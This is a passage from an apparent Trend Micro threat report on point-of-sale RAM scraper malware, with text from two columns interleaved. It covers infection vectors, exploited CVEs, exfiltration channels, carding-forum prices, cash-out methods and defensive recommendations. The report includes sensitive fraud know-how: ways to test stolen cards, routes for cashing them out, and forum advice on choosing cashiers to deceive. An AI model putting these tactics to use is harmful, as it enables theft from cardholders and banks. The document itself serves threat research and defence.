known to succumb to seemingly simple social
the malicious code embedded in the
engineering attacks, making this technique
files stealthily download and install
extremely effective.
PoS RAM scrapers on systems.

• As embedded malicious links: VULNERABILITY EXPLOITATION


Some emails can contain malicious
URLs and use social engineering New software vulnerabilities with varying
lures in the message body to severity levels are disclosed and patched
convince recipients to click them. every month by their respective vendors.
Clicking the URLs can directly Only a handful of these are successfully
download PoS RAM scrapers or can “weaponized.” Once weaponized, the
download droppers that stealthily vulnerabilities are used in cyber attacks for
install malware on systems. years. Some of the vulnerabilities, which may
no longer be new and have been regularly
Other infection techniques include using exploited, include the following:
hidden iframes, embedding scripts, and
exploiting vulnerabilities. In general, the • CVE-2010-3333: Rich Text Format
two methods above are most commonly (RTF) Stack Buffer Overflow
employed in phishing attacks because Vulnerability. [49]
they consistently work. Drive-by download
attacks can also be employed but cannot be • CVE-2012-0158: MSCOMCTL.OCX
effectively used without prior knowledge of Remote Code Execution (RCE)
targets’ browsing habits. Vulnerability, which is one of the most
commonly exploited vulnerabilities in
targeted attacks. [50]

54
Trend Micro | PoS RAM Scraper Malware

• CVE-2012-1889: Microsoft Extensible regular maintenance as well or upgraded.


Markup Language (XML) Core There are various other reasons. It was
Services Vulnerability. [51] surprising that a search of the National
Vulnerability Database revealed no Common
• CVE-2012-4681: Java 7 Vulnerability. Vulnerabilities and Exposures (CVE) records
[52] associated with PoS software. [56] One
plausible explanation for this is that the target
• CVE-2008-4841: WordPad and market for PoS software is so small and
Microsoft™ Word® Vulnerability. [53] specialized that the vulnerabilities discovered
are kept private and quickly patched without
• CVE-2010-0188: Adobe® Acrobat® drawing unnecessary attention. Now that
and Reader® Vulnerability. [54] PoS attacks are becoming common, PoS
software vulnerabilities may soon be publicly
• CVE-2010-2883: Adobe Reader disclosed and patched.
Vulnerability. [55]
The following figure based on Trend Micro™
Exploits successfully compromise systems Smart Protection Network™ data shows the
because patches for the vulnerabilities they PoS RAM scraper detection distribution by
target have not routinely been applied. The OS between April and June 2014.
vulnerable systems may not have undergone

Windows Server 2008 59.96%


Windows 7 20.53%
Windows XP 11.09%
Windows Server 2003 6.98%
Windows 8 0.82%
Windows Server 2000 0.41%
Windows Vista 0.21%

Figure 38: PoS RAM scraper detection distribution by OS

NOTE: All mentions of “detections” within the text refer to instances when threats were found on users’
computers and were subsequently blocked by any Trend Micro security software. Unless otherwise
stated, the figures featured in this report were based on data gathered by the Trend Micro Smart
Protection Network cloud security infrastructure, which uses a combination of in-the-cloud technologies
and client-based techniques to support on-premise products and hosted services.

It is worrisome to see that Windows XP, will no longer receive patches. Vulnerabilities
Windows Server 2000, and Windows Server discovered on other Windows versions that
2003 were still being used after Microsoft may also exist on the unsupported OSs will
ended support for the first two OSs as well as not get patched as well. Support for Windows
mainstream support for the third. This means Server 2003 has been extended until 2015
that new vulnerabilities found in these OSs so it still receives some patches. On the flip

55
Trend Micro | PoS RAM Scraper Malware

side, companies running the latest OSs are • Implement log and audit trails on
also at risk if they do not regularly patch systems.
software or perform system maintenance.
• Install and regularly update anti-
PCI DSS NONCOMPLIANCE ABUSE malware solutions installed on
systems.
As previously mentioned, although PCI DSS
Hardening systems and networks is not a
does not offer new secure technologies
trivial task. Companies that lack expertise
to protect electronic payment systems, it
or resources often incorrectly configure
does provide requirements to implement
their PoS systems and networks, making
additional layers of security control around
them susceptible to different attacks that
existing ones. Some of the key PCI
compromise them by installing malware.
DSS requirements to secure operating
environments include but are not limited to
CYBER ATTACKS
the following:

• Install ideally multitier hardware or Companies with PoS systems deployed


software firewalls to protect networks. in multiple sites or geographical locations
usually have a centralized PoS management
• Change default passwords, framework.
configurations, and encryption keys.
In the initial phase of a targeted attack, threat
• Eliminate unnecessary ports, actors gather intelligence (e.g., network
accounts, services, scripts, drivers, environment, organizational structure,
features, subsystems, file systems, employee information, news, etc.) on the
Web servers, and protocols. company. [57] Using the information that they
gather, they craft social engineering attacks
• Incorporate two-factor authentication and attempt to identify weaknesses in the
for remote network access among targets’ network setups that they can exploit
employees, administrators, and third in order to gain entry. The same steps are
parties. undertaken in cyber attacks that target PoS
systems.
BRANCH NETWORK
PoS
system Router
Switch

COMPANY B

Router PoS
Credit card Switch System

PoS Back-office database server


system
Credit card

Switch Router
PoS
INTERNET Back-office database server System

Main HQ database server

HQ

Figure 39: Attackers gain entry into the target network

56
Trend Micro | PoS RAM Scraper Malware

Once entry is gained, attackers then set data exfiltration. In attacks targeting PoS
up an initial beachhead and establish systems, they identify devices and infect
communication with C&C servers. They them with RAM scrapers. If they are lucky
then download additional tools and and succeed in compromising a System
malicious binaries while performing in-depth Center Configuration Manager (SCCM)
reconnaissance of the entire network to server, they can centrally deploy PoS
collect credentials (e.g., password hashes), RAM scrapers to all of the PoS systems
locate databases, scan ports, discover the that it manages. Similarly, compromising
network topography, audit OS environments, a whitelisting server would allow them to
identify host-naming conventions, and others. whitelist their malware to evade discovery.
They use the reconnaissance data for lateral
movement throughout the network and for
BRANCH NETWORK
PoS
system
Switch Router

COMPANY B
PoS
Credit card Router system
Switch

PoS Back-office database server


system
Credit card

Switch Router
Back-office database server PoS
INTERNET system

Main HQ database server

HQ
Figure 40: Attackers laterally move throughout the target network

Attacks like this are meticulously planned maintain persistence. A sophisticated attack
and well-executed, making them difficult can also use a kill switch to remove all traces
to detect. Attackers also set up multiple of infection with a single command issued via
backdoors across the network in case one a C&C server.
is discovered and blocked, allowing them to

57
Trend Micro | PoS RAM Scraper Malware

UNDERGROUND CREDIT CARD SCENE

Data-Exfiltration Methods functionality quickly evolved to include


data exfiltration. PoS RAM scrapers use
technologies such as FTP, HTTP POST or
Harvested Tracks 1 and 2 credit card data is GET requests and headers, Tor, and SMTP,
only valuable after exfiltration from infected among others, to exfiltrate data today.
systems. Older PoS RAM scrapers such
as Rdasrv did not have data-exfiltration Based on analyses of the various PoS RAM
functionality. They instead dropped the scrapers currently infecting companies’
data that they scraped onto a text file on systems, we broadly classified the data-
infected systems, which was then manually exfiltration techniques into those shown in the
or remotely collected. With the growing following figure, wherein “” represents data
popularity of PoS RAM scrapers as a tool movement.
for quick monetary gains, the malware’s

FTP server

C&C server

Compromised site

Fake hosted site

Stolen data Cybercriminals

Tor circuit

Email

RDP/Backdoor

Manual removal
Figure 41: Data-exfiltration techniques observed among PoS RAM scrapers

58
Trend Micro | PoS RAM Scraper Malware

The following were also noted: PAN’s final digit is a check digit calculated
using the Luhn algorithm. This is designed
• Cybercriminals register fake domains to catch errors in the PAN’s previous digits.
for data-exfiltration purposes with All valid credit card numbers must pass Luhn
hosting providers in countries with validation.
lax Internet law enforcement such as
Russia and Romania, among others. PoS RAM scrapers generally use regex
These fake domains act like man-in- matches to search for and harvest
the-middle (MitM) data collectors. Tracks 1 and 2 credit card data from the
process memory in the RAM. Depending on
• The Tor network conceals C&C the complexity of the regex, it may incorrectly
servers’ IP addresses and, by default, capture garbage data from the RAM in
encrypts all traffic. The C&C servers’ addition to valid card data. Well-defined
addresses end with a .onion pseudo- regexes return clean results but may be more
TLD, which cannot be resolved computationally expensive compared with
outside the Tor network and can looser ones. If the cybercriminals’ goal is to
only be accessed using a Tor proxy quickly capture data from the RAM, efficiency
application. ChewBacca makes use of is deemed more important than information
this functionality. quality.

• Cybercriminals use compromised To circumvent the bad data problem,


email accounts to exfiltrate stolen some PoS RAM scrapers implement Luhn
data. A command line email client validation to check the quality of the data
invoked through a batch script may that they harvest prior to exfiltration. A
be used to exfiltrate stolen data as an simpler solution is to validate the data that
attachment. BlackPOS makes use of they exfiltrate offline. Cybercriminals have
this functionality. been known to use cracked commercial DLP
products that merchants use for PCI DSS
• Cybercriminals create accounts compliance purposes in order to validate the
on FTP servers that are hosted data that they exfiltrate offline prior to selling
in countries with lax Internet law it in the underground carder marketplace.
enforcement. Malware such as Cracked commercial DLP solutions such as
BlackPOS or BrutPOS log in to FTP Card Recon can, in addition to validating
servers using hardcoded credentials credit card data, search for and sort
and copy over the stolen data. information by issuer and generate reports.
[58]
As PoS RAM scrapers evolve and as new
strategies to exploit PCI DSS guidelines are
discovered, we can assume that new data-
exfiltration techniques will be developed to
take advantage of these vulnerabilities.

Data Validation

As previously mentioned, PAN is a 16- to


19-digit number stored in Tracks 1 and 2 of
credit cards. Its first six digits refer to the IIN.
Major card networks have unique IIN ranges Figure 42: Card Recon’s interface
that identify who issued each card. The

59
Trend Micro | PoS RAM Scraper Malware

A home-brewed tool for validating Track 2 Cybercriminals need to check and validate
credit card data using the Luhn algorithm was credit card data prior to selling it in
also discovered inside a PoS RAM scraper underground carder marketplaces because
distribution package. A second tool or script selling bad information will damage their
most likely sorts the validated credit card reputation. Repeat offenses can also put their
data by issuer based on publicly available IIN personal security at risk.
information.

PoS Malware Analyzed

SHA-1 Trend Micro Detection Name

TSPY_POCARDL.AI
29ff4be5d8a595b5812fa84574f7c2785616f72b
SPYW_CCVIEW

54e35c98fd8bee2902f9138552706f1ba7702146 TROJ_DECBAL.A

Who Are Behind PoS Attacks? Forums are very welcoming to new members
(i.e., newbies) and even provide extensive
support to help newbies get up to speed in
Hackers infiltrate companies and steal carding. The idea behind this is simple—the
Tracks 1 and 2 credit card data from PoS more dumps sold, the more money hackers
systems using RAM scrapers. They then make. Selling dumps is not like selling
sell the stolen credit card data in batches drugs that are limited in quantity. Hackers
called “dumps” to carders in carding forums. tend to sell the same dumps to multiple
Buying and selling dumps is called “carding.” carders because verifying duplicate sales is
Carders are the consumers of stolen card difficult. Hackers also provide replacement
data, which they then monetize. Carding guarantees if cards stop working within an
forums sell both skimmed and scraped card agreed x number of hours after purchase.
data. We have not found price variances
between the two types of data although the
consensus in some carding forums seems to
be that data obtained via skimming is better.

Finding carding forums is easy. A simple


Internet search returns hundreds of results.

Most of the carding forums have detailed


tutorials for newbies. These show that a large
number of carding forums exist outside the Figure 43: Search results for “carding forum”
Deep Web and are easy to discover. [59] NOTE: Among the 790,000 results returned, only
a few hundred are actual forum links.

60
Trend Micro | PoS RAM Scraper Malware

Figure 44: Newbie carding tutorials

Stolen Card Data for Sale and demand as well as how much money
carders can potentially steal from stolen
cards before banks block or deactivate them.
Carding forums sell all kinds of card data to Our recent visit to the Russian underground
anyone who is willing to pay. Transactions shows that the prices of stolen credit card
are completed using Bitcoins, Western data have been declining over the years.
Union, MoneyGram, Ukash, and WebMoney, [60] Price variations, depending on card
among others, as these offer convenience brand, still exist. The following table shows
and anonymity to both buyers and sellers. representative prices of validated U.S.-based
credit cards in various carding forums.
Different card brands fetch varying prices
in carding forums, depending on supply

U.S.-Based Credit Card Prices by Brand

Site Visa/MasterCard AMEX Discover

Site 1 US$1.50/card US$2.00/card US$3.00/card

Site 2 US$1.00/card US$1.20/card US$1.50/card

Site 3 US$2.00/card US$2.50/card US$2.50/card

Site 4 US$2.00/card US$3.00/card US$3.00/card

61
Trend Micro | PoS RAM Scraper Malware

Figure 45: Carding forum page

Two key takeaways were obtained from are harder to come by compared with Visa
investigating credit card prices. First, buying or MasterCard cards, make them more
credit card data in bulk reduces unit prices, expensive.
in some cases, by up to 66%. Second, the
unit prices of Discover and AMEX cards Using Stolen Credit Cards
are higher than of those issued by Visa and
MasterCard. AMEX and Discover cards cost
The first principle in any carding forum is that
more because they have lower charge-back
one needs to spend money to make money.
volumes compared with Visa and MasterCard
Carders invest in dumps with the expectation
cards, which have lots of charge-backs
of quick return on investment (ROI). Active
and are thus subject to greater scrutiny.
discussions were seen on carding forums
The forums also claim that most merchants
on how much money carders can actually
do not properly verify AMEX and Discover
steal using stolen credit cards before banks
cards for large-sum transactions. Beliefs
block or deactivate them. The following table
and speculations such as these, combined
compiles amount ranges that carders claimed
with the fact that AMEX and Discover cards
they were able to steal.

Amount Ranges Carders Claimed to Have Stolen

Card Name Amount Range

Visa Classic US$500‒2,600/card

Visa Platinum US$3,000‒6,000/card

Visa Signature and Business US$5,000‒20,000/card

62
Trend Micro | PoS RAM Scraper Malware

Amount Ranges Carders Claimed to Have Stolen

Card Name Amount Range

Discover US$1,000‒5,000/card

Looking at the ranges in the table above, it errors that happen would not raise
is obvious that if carders get lucky, they can immediate suspicion. Carders do
cause substantial financial damage to banks not need to create authentic-looking
and card owners. The lure of big payoffs counterfeit cards, again due to the
continues to fuel a thriving underground nonpresence of attendants to verify
carding marketplace. their authenticity. The downside of this
type of cash-out method is that ATMs
After purchasing dumps from hackers, have a daily withdrawal limit and
carders check if the credit card numbers are vending kiosks inside shopping malls
still active before attempting to use them. only sell low-priced goods.
Some of the techniques they use include but
are not limited to the following: • Use for online purchases: This is,
by far, the most popular cash-out
• Sign up to pornographic websites, method. Carders tend to target poorly
which require a valid credit card for designed e-commerce websites and
age-verification purposes order goods from there. The wisdom
in carding forums is that a poorly
• Make small online donations to designed e-commerce website is a
charitable organizations to see if good indication of poor management
transactions are approved and so they may be easier to
complete fraudulent transactions with.
• Find online merchants who can verify Carders also frequent e-commerce
credit card limits without charging the websites that do not require the
cards (Note that these merchants are CVV2 number for card-not-present
extremely rare and their contacts or transactions. Once purchased, they
links are not publicly shared.) have the goods shipped to dump
locations (e.g., a foreign address, an
The most popular methods used to empty house, etc.). Goods purchased
successfully cash out on stolen credit cards with stolen cards are then sold
include the following: on auction sites such as eBay for
reduced prices. The income earned
• Use in ATMs, vending machines,
from selling such goods is converted
and gas pumps: Carders create
to cash and stashed away or can be
simple fake cards and use them at
used to purchase anonymous virtual
vending machines to purchase goods
currencies such as Bitcoins.
or at gas pumps to purchase fuel or if
they have the cards’ PINs, use them • Use for in-store purchases: This is
at ATMs to withdraw cash. ATMs, the riskiest cash-out method. Carders
vending machines, and gas pumps use counterfeit credit cards to make
are meant to self-serve and thus in-store purchases. Organized gangs
require no attendants. So, transaction who have access to expensive card-

63
Trend Micro | PoS RAM Scraper Malware

duplication machinery create, use, carry fake IDs to add credibility to


and sell counterfeit credit cards. the crime. Card protection or security
They have the ability to duplicate features are not consistent across
cards’ security features and to issuers and cashiers may not be
create authentic-looking copies. The familiar with all of them. Carding
foundation principle of fraudulent forums advise going to visible
in-store purchases is to embody the minority or young female cashiers
persona of the real card owner in for checkout, as they are considered
order to pull off theft. If carders wish more “vulnerable.” Carding forums
to purchase a US$3,000 TV, they have extensive lists of checkout
need to dress and behave like people scenarios to prepare for and provide
who can afford to do so. Nervous advice on how best to handle them.
actors will draw suspicion and
attention. This scam works because Carding is a quick means to easy payoff.
cashiers rarely verify credit cards Carders invest money to purchase dumps
upon checkout unless the transaction and, depending on the level of risk they
is over some x worth of dollars. For are willing to bear, they can get small to
large transactions, carders usually substantial ROI.

64
Trend Micro | PoS RAM Scraper Malware

LOOKING BEYOND THE HORIZON

Detection Statistics States recorded the highest number of PoS


RAM scraper detections. Note that the data
in the following figure is representative of
PoS RAM scrapers target a wide range of our customer base and may not accurately
companies across industries. The Trend represent the entire spectrum. It does provide
Micro Smart Protection Network revealed a good approximation of observed general
that between April and June 2014, the United trends.

United States 73.74%


Philippines 4.62%
Japan 4.41%
Brazil 2.73%
United Kingdom 2.52%
Australia 2.52%
Taiwan 2.10%
Malaysia 2.10%
Bahamas 1.89%
Canada 1.68%
Others 1.69%
Figure 46: PoS RAM scraper detection distribution by country

It is not surprising that the largest volume Similar to Verizon’s findings, Trend Micro
of detections was seen in the United States Smart Protection Network data revealed that
because the country’s economy is heavily most PoS attacks target companies in the
geared toward purchasing goods and retail industry. This industry, after all, has a
services using credit cards. Consumers very high volume of credit card transactions,
in other countries still tend to use cash or making it a lucrative target for harvesting
debit cards more than credit cards. The card data. Compromising a single PoS
high volume of credit card transactions that system usually yields data for thousands of
companies process in the United States credit cards and is a preferred alternative to
makes it a lucrative target for PoS RAM infecting thousands of victims’ systems in
scrapers. hopes of stealing card data from them.

65
Trend Micro | PoS RAM Scraper Malware

Retail 67.51%
Food and beverage 2.31%
Technology 0.84%
Manufacturing 0.84%
Utilities 0.63%
Healthcare 0.42%
Real estate 0.42%
Others 27.03%

Figure 47: PoS RAM scraper detection distribution by industry

Credit Card Data Breaches in the publicly disclosed data on security breach
incidents in the United States, including those
United States that involve credit cards. The organization
compiles this list from various sources (e.g.,
The number of credit card data breach media, Attorney-Generals’ offices, privacy
incidents has been steadily rising in the websites, etc.). We mined data from this list
past couple of years. Privacy Rights to look for information on credit card data
Clearinghouse—a California-based nonprofit breaches from 2005 to the present date.
corporation—publishes the “Chronology of The data we collected supports many of the
Data Security Breaches—Security Breaches observations and claims previously made in
2005‒Present.” This is a collection of all this paper.

100

87

50

0
2005 2006 2007 2008 2009 2010 2011 2012 2013 2014

Figure 48: Publicly disclosed credit card data breach incidents from 2005 to 2014

66
Trend Micro | PoS RAM Scraper Malware

The concept of PoS RAM scraping was first breaches and defines the categories as
introduced at the end of 2008 or in early follows:
2009. As shown in the previous figure, the
number of publicly disclosed credit card data • BSO: Business — others
breach incidents significantly increased in
2010. The high number of incidents remained • BSF: Business — financial and
steady since then and peaked in 2011. (Note insurance services
that the 2014 data remains incomplete.)
This rise can be partially attributed to the • BSR: Business — retailers and
development of new credit-card-data-stealing merchants
malware that incorporate proven methods
to bypass or exploit bugs in PCI DSS • EDU: Educational institutions
requirements. The data trend clearly shows
• GOV: Government and military
that the business of credit card data theft is
well established and is not showing signs of
• MED: Healthcare — medical
slowing down in the near future.
providers
The Privacy Rights Clearinghouse data
• NGO: Nonprofit organizations
provides a breakdown of the different
industries that reported credit card data

BSR 46.99%
BSO 22.41%
BSF 9.64%
MED 8.92%
EDU 5.54%
GOV 3.37%
NGO 3.13%

Figure 49: Publicly disclosed data on the types of organization that have suffered credit card data
breaches

As shown above, the industry distribution The Privacy Rights Clearinghouse also
closely matches data from the Trend Micro provides a breakdown of the breach methods
Smart Protection Network and Verizon. Most employed in credit card data breaches. The
of the attacks target retailers and merchants, breach methods are as follows:
as companies in the retail industry process
a huge volume of credit card transactions. • Unintended disclosure (DISC):
Successfully compromising the networks of Sensitive information posted publicly
big retailers or merchants yields thousands of on a website, mishandled, or sent to
credit card credentials in a very short period the wrong party via email, fax, or mail.
of time, making them lucrative targets.

67
Trend Micro | PoS RAM Scraper Malware

• Hacking or malware (HACK): discarded, or stolen nonelectronic


Electronic entry by an outside party, records such as paper documents.
malware, and spyware.
• Portable device (PORT): Lost,
• Payment card fraud (CARD): Fraud discarded, or stolen laptop, PDA,
involving debit and credit cards that smartphone, portable memory device,
is not accomplished via hacking. For CD, hard drive, data tape, etc.
example, skimming devices at point-
of-service terminals. • Stationary device (STAT): Lost,
discarded, or stolen stationary
• Insider (INSD): Someone with electronic device such as a computer
legitimate access intentionally or server not designed for mobility.
breaches information such as an
employee or a contractor. • Unknown or others (UNKN):
Breach was caused by unknown or
• Physical loss (PHYS): Lost, undetermined circumstances.

HACK 52.29%
INSD 16.39%
PORT 7.71%
CARD 6.51%
PHYS 5.78%
DISC 5.30%
STAT 2.65%
UNKN 3.37%

Figure 50: Publicly disclosed data on methods used in credit card data breaches

It is not surprising that hacking and malware modifications in order to adjust to changing
attacks comprise the bulk of breach methods conditions.
discovered across incidents. Hacking or
malware attacks succeed because they The following table lists the largest publicly
provide cybercriminals a certain degree disclosed credit card data breach incidents
of anonymity, convenience (i.e., remote in the United States from 2005 to the present
deployment), and flexibility to make quick day.

68
Trend Micro | PoS RAM Scraper Malware

Massive U.S. Credit Card Data Breaches from 2005 to 2014

Number of Credit Card


Organization Date Made Public
Records Stolen [61], [62]

TJX Companies 45.6M January 12, 2007

Heartland Payment Systems 160M January 20, 2009

Sony 12M April 27, 2011

Target Corporation 40M December 13, 2013

Note that the table above only includes of Tracks 1 and 2 credit card data
incidents wherein more than 10 million credit required to duplicate cards but
card records were stolen because those they store enough information for
incidents made headlines. Looking at the cybercriminals to use in committing
data above, we see a pattern emerge—a card-not-present transaction fraud.
massive credit card data breach incident
occurs every two years. • Steal encrypted databases: PCI
DSS requires credit card data at rest
Other Credit Card Data Theft to be encrypted. The Privacy Rights
Clearinghouse data has reports of
Methods several breach incidents wherein
encrypted credit card databases were
Credit card data theft has been occurring stolen. Hackers may have retrieved
long before the concept of RAM scraping or recovered the decryption keys
was first introduced. PoS RAM scraping is from other systems, applications, or
a convenient way to steal large volumes of RAM and can decrypt the stored data
unencrypted credit card data, making it a offline.
popular attack vector among hackers. Other
data theft methods include the following: • Target non-PCI-DSS-certified
merchants: Retailers and merchants
• Attack e-commerce websites: A are not the only ones that process
large percentage of daily credit card credit card transactions. All sorts of
transactions occur on e-commerce companies (e.g., medical clinics,
websites. Hackers use a variety insurance brokers, rental offices,
of breach vectors to attack poorly notary publics, etc.) accept credit
protected or configured e-commerce card payments as well. Some of them
websites (e.g., via SQL injection, may not be PCI DSS certified and
vulnerability exploitation, etc.). Once may store credit card data, along with
the websites are compromised, other customer records, unencrypted
hackers can access encrypted or in their systems.
unencrypted credit card databases
and steal data. E-commerce websites • Sniff networks: PCI DSS requires
do not have access to entire sets credit card data in transit to be

69
Trend Micro | PoS RAM Scraper Malware

encrypted when transferred over data is under constant threat unless strong
the Internet. No such encryption protection measures are employed.
requirements exist for credit card
data transferred over LANs or WANs. New Credit Card Technologies
If hackers manage to breach the
networks of companies that process
New technologies are being introduced in
credit card transactions, they can
the North American market to help curb or
sniff LAN or WAN traffic and can
prevent credit card fraud as well as to make
match patterns in order to retrieve
transactions more convenient and secure.
credit card data. This is a passive and
We will focus on two technologies that are
stealthier strategy compared with PoS
now being implemented in many countries—
RAM scraping.
EMV chips and contactless radio frequency
• Exploit vulnerable PoS software: identification (RFID).
PoS software have vulnerabilities
even though we have not seen EMV
them publicly disclosed. Hackers
may discover vulnerabilities in PoS EMV or chip-and-PIN credit cards are now
software and may exploit them in widely used in Canada and Mexico. The
order to gain remote access to the United States is scheduled to switch to EMV
process memory space in the RAM to credit cards by October 2015. [63] EMV
steal credit card data. cards are also being widely used in South
American, European, and Asian countries.
• Exploit APIs and proprietary
protocols: The different parties
involved in the credit card transaction
flow model use proprietary protocols
and public or private APIs for
communication. Hackers may
discover flaws or vulnerabilities in
these protocols or APIs and exploit
them in order to gain access to credit
card transaction data.

• Steal personal information:


Hackers can steal customers’ Figure 51: CIBC credit card that uses the EMV
personal information (e.g., date and RFID technologies
of birth, Social Security Number,
address, etc.), which are not explicitly EMV is the global standard for integrated
protected by PCI DSS requirements. circuit cards (ICCs). Europay, MasterCard,
They can then sell this information and Visa (EMV) created the EMV consortium
underground. Cybercriminals who back in 1994. EMV cards store encrypted
purchase this data can use it to Tracks 1 and 2 data on the chip. They
commit identity theft and apply for interact with PoS terminals that have
legitimate credit cards using victims’ ICC readers and use the EMV-defined
personal information. protocol for transactions. Similar to debit
cards, cardholders need to input a PIN
The list above is, by no means, for authentication before transactions are
comprehensive but it shows that sensitive processed.

70
Trend Micro | PoS RAM Scraper Malware

After the Target data breach in sent to the PoS system for processing, it will
December 2013, EMV credit cards have become susceptible to PoS RAM scraper
been the focus of much discussion, as attacks because the decrypted data resides
many see it as the solution to prevent future in the RAM.
credit card data breaches. The reality is,
EMV credit cards cannot prevent PoS RAM U.K. credit card fraud statistics show that
scraper attacks. [64], [65] As previously even after EMV cards were introduced in the
mentioned, EMV cards store encrypted country, losses related to card-not-present
Tracks 1 and 2 credit card data on the chip. fraud dramatically increased in number. [66]
This chip makes it extremely difficult for This shows that cybercriminals are using
cybercriminals to manufacture counterfeit stolen credit card data for online purchases
credit cards using stolen data, which helps instead of manufacturing and using
reduce counterfeiting and lost or stolen card counterfeit cards.
fraud. If the EMV Tracks 1 and 2 data is

300
Chip and PIN
deployment
Card not present
period

Counterfeit
Losses in (£m)

Lost and stolen

150 Mail nonreceipt

Check fraud

ID theft

Online banking

0
2004 2005 2006 2007 2008

Figure 52: Fraud statistics on U.K.-issued cards


Source: “Chip and PIN Is Broken”

Researchers from the University of CONTACTLESS RFID CARDS


Cambridge showed that cybercriminals
can cheaply construct special devices
Contactless payment technology in credit
that intercept and modify communications
cards (e.g., MasterCard’s PayPass, Visa’s
between EMV credit cards and PoS
payWave, etc.) uses RFID and allows
terminals, fooling the latter into accepting
cardholders to just wave their cards in front
fake successful PIN verifications. Even
of contactless payment terminals to complete
though this is a proof-of-concept (PoC)
transactions. Because signature or PIN entry
attack, it still shows that fundamental
is not required for contactless purchases,
flaws exist in the EMV protocol. As EMV
a maximum purchase limit per transaction
card usage becomes more widespread,
is set by credit card issuers, typically
cybercriminals will inevitably discover
amounting to $25. Contactless payment
exploitable flaws in such cards.
cards do not use a universal protocol for

71
Trend Micro | PoS RAM Scraper Malware

payment transactions. Each card brand stored in contactless cards. There are open
instead defines its own proprietary protocol source software libraries for reading and
based on EMV principles. This means that a extracting data from contactless cards, which
MasterCard PayPass reader cannot process can be used to build custom NFC apps.
transactions for Visa payWave cards. [67] Armed with an NFC-enabled smartphone
With the growing popularity of contactless and an app that can read contactless card
payment cards, however, hybrid card readers data via NFC, hackers can brush against
have now been developed. potential victims in crowded public spaces
and wirelessly steal their credit card data
Contactless payment cards all use the in an act that has been dubbed “electronic
same communication protocol—EMV pickpocketing.” The simple solution to
Contactless Communication Protocol prevent electronic pickpocketing is to put
Specifications—for communication with near- contactless cards in shielded sleeves that will
field-communication (NFC)-enabled devices. block the electromagnetic energy required to
Many smartphones today are NFC enabled power the RFID chip on them.
and have apps that can read all of the data

72
Trend Micro | PoS RAM Scraper Malware

CONCLUSION AND RECOMMENDATIONS

Prevention • Eliminate unnecessary ports,


accounts, services, scripts, drivers,
features, subsystems, file systems,
PCI DSS does not offer new secure Web servers, and protocols.
technologies to protect electronic payment
systems but instead provides requirements • If remote access is not required,
to implement additional layers of security disable it.
control around existing technologies. PoS
system operators should follow security best • Implement point-to-point encryption.
practices to improve their overall system
security posture. A few tips are provided • Encrypt communications between
below. applications and data.

HARDWARE BASED • Deploy the latest version of OSs and


regularly apply patches.
• Install ideally multitier hardware
• Regularly apply updates to installed
firewalls to protect networks.
software.
• Deploy breach detection systems
• Restrict access to the Internet on PoS
(BDSs) to detect targeted attacks.
systems.
• Deploy intrusion detection and
• Use whitelisting to only allow
prevention systems (IDPSs) to scan
approved applications to run.
inbound and outbound traffic.
• Put a mechanism in place to identify
• Incorporate two-factor authentication
if and when system components
for remote network access among
change.
employees, administrators, and third
parties.
• Set up PoS systems to automatically
reimage every 24 hours.
• Implement point-to-point encryption.
• Restrict communication in and out of
SOFTWARE BASED
environments to only what is required.

• Install ideally multitier software • Install and regularly update anti-


firewalls to protect networks. malware solutions to protect against
malware and malicious URLs.
• Change default passwords,
configurations, and encryption keys. • Deploy a vulnerability scanner to
Use strong passwords. scan systems, applications, and Web
applications.

73
Trend Micro | PoS RAM Scraper Malware

• Deploy DLP software to discover, actually required by various compliance


monitor, protect, and manage standards such as PCI DSS.
confidential data.
Trend Micro Deep Security offers File
POLICY BASED Integrity Monitoring capabilities to monitor
critical OS and application files such as
directories, registry keys, and values to
• Enforce strict policies regarding
detect and report malicious and unexpected
physical PoS system repairs and
changes in real time. [68] These include
upgrades.
changes to PoS systems.
• Routinely delete stored cardholder
Deep Security can restrict communication in
data.
and out of environments through a firewall
• Restrict access to the Internet on PoS policy that can be tailored for specific server
systems. requirements and can protect against both
inbound and outbound communication.
• Implement log and audit trails on PoS Its firewall capabilities offer logging and
systems. alerting to make it easier to troubleshoot and
manage.
• Limit internal physical access to PoS
systems. As companies demand constantly evolving
application use, it is often difficult to keep
It is important to understand that following up with patching systems against known
security best practices does not guarantee vulnerabilities. This is where Deep Security
that PoS systems will never get infected. Intrusion Prevention capabilities that protect
It will just make it extremely difficult for against potential exploits to vulnerabilities are
cybercriminals to infect them. Determined important to have on the list. An important
hackers or cybercriminals will still invest time capability of our intrusion prevention is
to look for weaknesses in companies’ IT the ability to automatically update security
defenses and may eventually find a way into policies to ensure that the right protection is
their PoS systems. applied, even before you have had a chance
to patch.
Trend Micro Solutions
Finally, Deep Security Anti-Malware that
includes Web reputation detection will not
To address risks within evolving businesses, only protect against malware but will also
Trend Micro provides a security solution that detect and protect against known malicious
is open, automated, and highly scalable, that URLs.
fits their existing infrastructure, seamlessly
integrating with key environments such as When those applications are available
VMware® or cloud environments such as through the Web and provide customers,
Amazon Web Services. partners, or global employees the ability
to share information, detection of potential
Changes in system components can occur threats or occasional penetration testing is
for many reasons, many of which are not not enough, especially as the number of apps
due to attacks against systems. That said, increases. Trend Micro offers Deep Security
monitoring systems such as PoS devices for Web Apps, a comprehensive, integrated
for changes is becoming more critical when software-as-a-service (SaaS) offering that
it comes to security control. It can not only continuously detects vulnerabilities, delivers
provide early indications of problems, it is

74
Trend Micro | PoS RAM Scraper Malware

actionable security insight, and protects Conclusion


applications with Secure Sockets Layer
(SSL) certificates to encrypt transactions
and communications, as well as Intrusion Credit card data breach is an established
Prevention and Web Application Firewall cybercrime that will not show signs of slowing
(WAF) rules. down in the near future. Cybercriminals
target all industries and use a wide range of
In any attack, besides identifying components breach techniques. Research revealed that
using endpoint or server security solutions, most PoS RAM scrapers affected companies
a network approach is also favored. Trend in the retail industry, as they have very high
Micro Custom Defense solutions can support credit card transaction volumes, making them
a retail organization in a number of ways, lucrative targets for harvesting Tracks 1 and
namely: [69] 2 data.

• Trend Micro Deep Discovery can New credit card technologies are being
detect the download of malware and introduced in the North American market to
RATs without antivirus signatures. [70] help curb or prevent credit card fraud as well
as to make transactions more convenient
• Deep Discovery can detect certain and secure. Though these technologies
lateral movements and the spread of will help reduce counterfeiting and lost or
malware. stolen credit card fraud, they cannot prevent
PoS RAM scraper attacks. On the flip side,
• Deep Discovery can detect C&C they will introduce new attack vectors that
communication, both inbound and cybercriminals can exploit to steal credit card
outbound. data.

• Deep Discovery can detect Bob Russo’s Statement for the Record is
both external and internal C&C accurate, “Our work is broad for a simple
communication. reason: there is no single answer to securing
payment card data. No one technology is a
• Deep Discovery can detect internal panacea; security requires a multilayered
